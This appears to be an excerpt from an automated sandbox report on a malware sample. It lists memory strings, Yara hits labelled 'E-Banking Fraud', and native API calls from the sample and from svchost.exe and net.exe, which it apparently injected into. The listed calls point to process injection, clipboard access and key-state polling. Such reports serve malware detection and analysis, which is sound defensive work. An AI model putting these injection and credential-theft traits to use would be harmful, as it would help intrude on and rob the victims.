                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033&(
                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000004.00000002.3866320365.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.00000000048F6000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.0000000003F66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000005262000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000048D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.00000000048F6000.00000004.80000000.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000005262000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.0000000003F66000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000048D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000004A88000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000040F8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

                E-Banking Fraud

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042CA43 NtClose,2_2_0042CA43
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C70 NtFreeVirtualMemory,2_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03434340 NtSetContextThread,LdrInitializeThunk,4_2_03434340
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03434650 NtSuspendThread,LdrInitializeThunk,4_2_03434650
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432B60 NtClose,LdrInitializeThunk,4_2_03432B60
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03432BE0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03432BF0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03432BA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432AD0 NtReadFile,LdrInitializeThunk,4_2_03432AD0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432AF0 NtWriteFile,LdrInitializeThunk,4_2_03432AF0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432F30 NtCreateSection,LdrInitializeThunk,4_2_03432F30
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432FE0 NtCreateFile,LdrInitializeThunk,4_2_03432FE0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432FB0 NtResumeThread,LdrInitializeThunk,4_2_03432FB0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03432EE0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03432E80
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03432D10
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03432D30
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432DD0 NtDelayExecution,LdrInitializeThunk,4_2_03432DD0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03432DF0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432C60 NtCreateKey,LdrInitializeThunk,4_2_03432C60
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03432C70
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03432CA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034335C0 NtCreateMutant,LdrInitializeThunk,4_2_034335C0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034339B0 NtGetContextThread,LdrInitializeThunk,4_2_034339B0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432B80 NtQueryInformationFile,4_2_03432B80
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432AB0 NtWaitForSingleObject,4_2_03432AB0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432F60 NtCreateProcessEx,4_2_03432F60
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432F90 NtProtectVirtualMemory,4_2_03432F90
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432FA0 NtQuerySection,4_2_03432FA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432E30 NtWriteVirtualMemory,4_2_03432E30
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432EA0 NtAdjustPrivilegesToken,4_2_03432EA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432D00 NtSetInformationFile,4_2_03432D00
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432DB0 NtEnumerateKey,4_2_03432DB0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432C00 NtQueryInformationProcess,4_2_03432C00
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432CC0 NtQueryVirtualMemory,4_2_03432CC0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03432CF0 NtOpenProcess,4_2_03432CF0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03433010 NtOpenDirectoryObject,4_2_03433010
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03433090 NtSetValueKey,4_2_03433090
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03433D70 NtOpenThread,4_2_03433D70
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03433D10 NtOpenProcessToken,4_2_03433D10
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02989310 NtCreateFile,4_2_02989310
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02989620 NtClose,4_2_02989620
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02989780 NtAllocateVirtualMemory,4_2_02989780
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02989480 NtReadFile,4_2_02989480
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02989580 NtDeleteFile,4_2_02989580
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00409A40, 0_2_00409A40
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00412038, 0_2_00412038
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00427161, 0_2_00427161
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0047E1FA, 0_2_0047E1FA
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004212BE, 0_2_004212BE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00443390, 0_2_00443390
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00443391, 0_2_00443391
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0041A46B, 0_2_0041A46B
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0041240C, 0_2_0041240C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00446566, 0_2_00446566
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004045E0, 0_2_004045E0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0041D750, 0_2_0041D750
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004037E0, 0_2_004037E0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00427859, 0_2_00427859
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00412818, 0_2_00412818
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0040F890, 0_2_0040F890
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0042397B, 0_2_0042397B
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00411B63, 0_2_00411B63
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0047CBF0, 0_2_0047CBF0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0044EBBC, 0_2_0044EBBC
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00412C38, 0_2_00412C38
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0044ED9A, 0_2_0044ED9A
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00423EBF, 0_2_00423EBF
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00424F70, 0_2_00424F70
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0041AF0D, 0_2_0041AF0D
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_040E70B0, 0_2_040E70B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418A03, 2_2_00418A03
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042F043, 2_2_0042F043
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004031A0, 2_2_004031A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401200, 2_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004102C3, 2_2_004102C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416C43, 2_2_00416C43
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401C28, 2_2_00401C28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401C30, 2_2_00401C30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416C3E, 2_2_00416C3E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004014D0, 2_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004104E3, 2_2_004104E3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E563, 2_2_0040E563
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402D21, 2_2_00402D21
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402D30, 2_2_00402D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004025DC, 2_2_004025DC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004025E0, 2_2_004025E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4E3F0, 2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D003E6, 2_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA352, 2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC02C0, 2_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE0274, 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF81CC, 2_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF41A2, 2_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D001AA, 2_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC8158, 2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30100, 2_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDA118, 2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD2000, 2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3C7C0, 2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64750, 2_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40770, 2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5C6E0, 2_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D00591, 2_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535, 2_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEE4F6, 2_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF2446, 2_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4420, 2_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF6BD7, 2_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFAB40, 2_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80, 2_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0, 2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D0A9A6, 2_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962, 2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E8F0, 2_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C268B8, 2_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4A840, 2_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C42840, 2_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C32FC8, 2_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4CFE0, 2_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBEFA0, 2_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB4F40, 2_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C82F28, 2_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60F30, 2_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE2F30, 2_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFEEDB, 2_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C52E90, 2_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFCE93, 2_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40E59, 2_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFEE26, 2_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3ADE0, 2_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C58DBF, 2_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4AD00, 2_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDCD1F, 2_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30CF2, 2_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE0CB5, 2_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40C00, 2_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C8739A, 2_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2D34C, 2_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF132D, 2_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5B2C0, 2_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE12ED, 2_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C452A0, 2_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4B1B0, 2_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7516C, 2_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2F172, 2_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D0B16B, 2_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEF0CC, 2_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C470C0, 2_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF70E9, 2_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFF0E0, 2_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFF7B0, 2_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF16CC, 2_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C85630, 2_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D095C3, 2_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDD5B0, 2_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF7571, 2_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C31460, 2_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
